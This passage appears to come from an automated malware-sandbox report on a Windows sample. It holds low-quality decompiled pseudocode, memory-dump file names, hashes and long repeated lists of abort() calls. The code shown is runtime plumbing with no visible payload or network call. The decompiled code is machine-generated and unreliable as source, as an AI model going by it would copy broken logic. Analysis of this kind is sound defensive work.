Instruction Fuzzy Hash: CDB17DB36083198FD310CE2DD0D52A9BBD6AB85318F09867ED9E587752C335EC49C742

Uniqueness

Uniqueness Score: -1.00%

Function 013D6750 Relevance: 42.2, APIs: 28, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E013D6750(CHAR* __eax, CHAR* __edx) {
				char _v2;
				char _v4;
				void* _v16;
				char _v32;
				CHAR* _v48;
				CHAR* _v52;
				char* _v100;
				signed int _t70;
				struct HINSTANCE__* _t71;
				_Unknown_base(*)()* _t72;
				struct HINSTANCE__* _t75;
				_Unknown_base(*)()* _t76;
				void* _t78;
				CHAR* _t79;
				void* _t80;
				signed char _t81;
				CHAR* _t86;
				struct HINSTANCE__* _t87;
				signed int _t89;
				char _t92;
				signed char* _t93;
				signed int _t94;
				void* _t95;
				signed int _t97;
				CHAR* _t100;
				signed int _t104;
				void* _t109;
				signed char* _t111;
				_Unknown_base(*)()* _t112;
				void* _t114;
				signed int _t116;
				void* _t118;
				void* _t119;
				char** _t120;
				char** _t121;
				struct HINSTANCE__** _t123;
				struct HINSTANCE__** _t124;

				_t119 = _t118 - 0x2c;
				_v52 = __eax;
				_t70 = __edx[0x60];
				_v48 = __edx;
				if((_t70 & 0x40000000) == 0 ||  *((char*)(__edx + 0x70)) == 0) {
					_t86 = _v48;
					if(_t86[0x10] == 0) {
						_t92 = _t86[0x48];
						if( *0x14f20b4 != 4) {
							goto L38;
						} else {
							_v32 = _t92;
							if((_t70 & 0x40000000) != 0) {
								_v48[0x70] = 0;
							}
							_t86 = _v48;
							_t86[0x10] =  &_v32;
							goto L9;
						}
					} else {
						goto L9;
					}
				} else {
					L9:
					_t78 = 0;
					while(1) {
						_t104 = _v52;
						_t100 = _v48;
						_t93 =  *(_t104 + _t78 * 4);
						_t111 =  *(_t100 + _t78 * 4);
						if( *((char*)(_t104 + _t78 + 0x6c)) != 0) {
							break;
						}
						if( *((char*)(_t100 + _t78 + 0x6c)) != 0) {
							if(_t93 == 0) {
								goto L13;
							} else {
								if( *(_t78 + 0x14f20b0) != 4) {
									break;
								} else {
									 *_t93 = _t111;
									goto L13;
								}
							}
						} else {
							_t89 = _t86 & 0xffffff00 | _t111 != 0x00000000;
							_t116 = _t89;
							_t104 = _t89 & 0xffffff00 | _t93 != 0x00000000;
							_t86 = _t116;
							if((_t86 & _t104) == 0 || _t93 == _t111) {
								L13:
								_t78 = _t78 + 1;
								if(_t78 == 0x11) {
									goto L24;
								} else {
									continue;
								}
							} else {
								_t116 =  *(_t78 + 0x14f20b0) & 0x000000ff;
								if(_t116 >= 4) {
									 *_t93 =  *_t111;
									_t93[(char*)( &_v4)] = _t111[(char*)( &_v4)];
									_t109 =  &(_t93[4]) & 0xfffffffc;
									_t95 = _t93 - _t109;
									_t114 = _t111 - _t95;
									_t97 = _t95 + _t116 >> 2;
									_t78 = memcpy(_t109, _t114, _t97 << 2);
									_t119 = _t119 + 0xc;
									_t104 = _t114 + _t97 + _t97;
									if(_t78 != 0x11) {
										continue;
									} else {
										L24:
										_t79 = _v52;
										if(( *(_t79 + 0x63) & 0x00000040) == 0 ||  *((char*)(_t79 + 0x70)) == 0) {
											_t86 = _v52;
											_t80 = 0;
											if(_t86[0x10] == 0) {
												_t111 = _v48;
												_t94 =  *0x14f20b4 & 0x000000ff;
												_t81 = _t111[0x10];
												if((_t111[0x63] & 0x00000040) == 0 || _t111[0x70] == 0) {
													if(_t94 != 4) {
														break;
													} else {
														_t81 =  *_t81;
														goto L37;
													}
												} else {
													L37:
													_t80 = _t81 - _v52[0x48] + _v48[0x68];
													goto L27;
												}
											} else {
												L27:
												return _t80;
											}
										} else {
											return 0;
										}
									}
								} else {
									if(_t116 != 0) {
										 *_t93 =  *_t111 & 0x000000ff;
										if((_t116 & 0x00000002) != 0) {
											_t93[(char*)( &_v2)] = _t111[(char*)( &_v2)] & 0x0000ffff;
										}
									}
									goto L13;
								}
							}
						}
						goto L66;
					}
					L38:
					abort();
					abort();
					abort();
					abort();
					abort();
					L013E42F8();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					_push(_t116);
					_push(_t104);
					_push(_t111);
					_t120 = _t119 - 0x1c;
					 *_t120 = "libgcc_s_dw2-1.dll";
					_t71 = GetModuleHandleA(_t86);
					_t121 = _t120 - 4;
					if(_t71 == 0) {
						_t72 = 0x13dae40;
						_t112 = E013DA660;
					} else {
						_t87 = _t71;
						 *_t121 = "libgcc_s_dw2-1.dll";
						_t75 = LoadLibraryA(??);
						_t123 = _t121 - 4;
						 *0x14f2020 = _t75;
						_v100 = "__register_frame_info";
						 *_t123 = _t87;
						_t76 = GetProcAddress(??, ??);
						_t124 = _t123 - 8;
						_t112 = _t76;
						_v100 = "__deregister_frame_info";
						 *_t124 = _t87;
						_t72 = GetProcAddress(??, ??);
						_t121 = _t124 - 8;
					}
					 *0x1481004 = _t72;
					if(_t112 != 0) {
						_v100 = 0x14f2024;
						 *_t121 = 0x14b3104;
						 *_t112();
					}
					 *_t121 = E013C1560;
					return E013C14A0();
				}
				L66:
			}

0x013d6754
0x013d6757
0x013d675b
0x013d675e
0x013d6767
0x013d676f
0x013d6778
0x013d686f
0x013d6872
0x00000000
0x013d6878
0x013d6878
0x013d6881
0x013d6887
0x013d6887
0x013d688b
0x013d6893
0x00000000
0x013d6893
0x00000000
0x00000000
0x00000000
0x013d677e
0x013d677e
0x013d677e
0x013d67a7
0x013d67a7
0x013d67ab
0x013d67b4
0x013d67b7
0x013d67ba
0x00000000
0x00000000
0x013d67c5
0x013d678a
0x00000000
0x013d678c
0x013d6793
0x00000000
0x013d6799
0x013d6799
0x00000000
0x013d6799
0x013d6793
0x013d67c7
0x013d67c9
0x013d67ce
0x013d67d3
0x013d67d5
0x013d67db
0x013d679b
0x013d679b
0x013d67a1
0x00000000
0x00000000
0x00000000
0x00000000
0x013d67e1
0x013d67e1
0x013d67eb
0x013d6815
0x013d681b
0x013d6822
0x013d6825
0x013d6827
0x013d682b
0x013d682e
0x013d682e
0x013d682e
0x013d6833
0x00000000
0x013d6840
0x013d6840
0x013d6840
0x013d6848
0x013d6850
0x013d6854
0x013d685b
0x013d68a5
0x013d68a9
0x013d68b0
0x013d68b7
0x013d68c2
0x00000000
0x013d68c8
0x013d68c8
0x00000000
0x013d68c8
0x013d68ca
0x013d68ca
0x013d68d5
0x00000000
0x013d68d5
0x013d685d
0x013d685d
0x013d6864
0x013d6864
0x013d689b
0x013d68a4
0x013d68a4
0x013d6848
0x013d67ed
0x013d67ef
0x013d67f4
0x013d67fc
0x013d6803
0x013d6803
0x013d67fc
0x00000000
0x013d67ef
0x013d67eb
0x013d67db
0x00000000
0x013d67c5
0x0147a9ec
0x0147a9ec
0x0147a9f1
0x0147a9f6
0x0147a9fb
0x0147aa00
0x0147aa05
0x0147aa0a
0x0147aa0f
0x0147aa14
0x0147aa19
0x0147aa1e
0x0147aa23
0x0147aa28
0x0147aa2d
0x0147aa32
0x0147aa37
0x0147aa3c
0x0147aa44
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013c1549
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e587d2919684eea71113055da1fe424bd30f816fd355f9682b3e221e997fc23
Instruction ID: 806e06b7b9a86babc61e457ea740b101e0a3f3812f46d19c86dc999e2942202f
Opcode Fuzzy Hash: 3e587d2919684eea71113055da1fe424bd30f816fd355f9682b3e221e997fc23
Instruction Fuzzy Hash: D041E4F69083499FEB25CF2CD086727BFE1AF45228F09484DDAA54B352D331E845C781

Uniqueness

Uniqueness Score: -1.00%

Function 013D68E0 Relevance: 40.6, APIs: 27, Instructions: 131COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9F1
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9F6
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 5a5ad8c3197989b9ef0289615d29a22828a8b3b9cfdc7d7201cf189646febe6f
Instruction ID: 743a45e5c10ef5ee1af2fc39d17f04a03cc6109d7aab7a0523d54324f15f103a
Opcode Fuzzy Hash: 5a5ad8c3197989b9ef0289615d29a22828a8b3b9cfdc7d7201cf189646febe6f
Instruction Fuzzy Hash: A131F7B26087089FD310CE5CD4923EBFBE5AB85354F94852AD7A447352D334AC54D791

Uniqueness

Uniqueness Score: -1.00%

Function 013D6E97 Relevance: 37.6, APIs: 25, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9956866ca0c09ab31038d51efc1dd9e3d686808f033522c65c74dce802eebfe8
Instruction ID: 57ccea49547441f89f224be56a5cad0e500e57a3465bef4a7b1c776f11a6bde9
Opcode Fuzzy Hash: 9956866ca0c09ab31038d51efc1dd9e3d686808f033522c65c74dce802eebfe8
Instruction Fuzzy Hash: 260149F3900F6107E7244E3CC8D6375FAD25B82218F098369CAB6276C6C134E859A240

Uniqueness

Uniqueness Score: -1.00%

Function 013D6BCC Relevance: 37.6, APIs: 25, Instructions: 50COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 82ac7e22f0b358fa744131d25c015ca966ccbe62d5d6608a4b95386560518a64
Instruction ID: 08e29c71a9cd4be6673c0768a3661401d79085249ac991c18a6b60b57ad24c00
Opcode Fuzzy Hash: 82ac7e22f0b358fa744131d25c015ca966ccbe62d5d6608a4b95386560518a64
Instruction Fuzzy Hash: 61E0C277A0C32D4AD1207D9DB4800BFF7A8DB5639DF4A1E2DCA99B3951D211E89882C6

Uniqueness

Uniqueness Score: -1.00%

Function 013D6DB0 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f48228c6fbd0abe6de9678fbad4c5ed31efc7c1da86e7325ee1034fe0a9b327b
Instruction ID: 5373b8d7aff8e574860af9c2f45ac71ad180aa59f5ff509ab2b847e9fde7e42b
Opcode Fuzzy Hash: f48228c6fbd0abe6de9678fbad4c5ed31efc7c1da86e7325ee1034fe0a9b327b
Instruction Fuzzy Hash: 58D0A771D0D32F8ACB045F2D50AC47DF3F95E5A34CBAB65A8D055F3542D621DA05460A

Uniqueness

Uniqueness Score: -1.00%

Function 013D6E20 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 48ba30ab683870b0c4f545cd545f78fc5acbf6f11beb56f33af3b23c5e0fe13d
Instruction ID: 9f9756463ad6d01df179509237a457c748145116ca0d2d2267baefc708670f16
Opcode Fuzzy Hash: 48ba30ab683870b0c4f545cd545f78fc5acbf6f11beb56f33af3b23c5e0fe13d
Instruction Fuzzy Hash: C5D0177494970E8EC300EF08D09847AF7F9AB8F20AB86AA69C448A77A1D631D8048A05

Uniqueness

Uniqueness Score: -1.00%

Function 013D6D77 Relevance: 37.5, APIs: 25, Instructions: 40COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
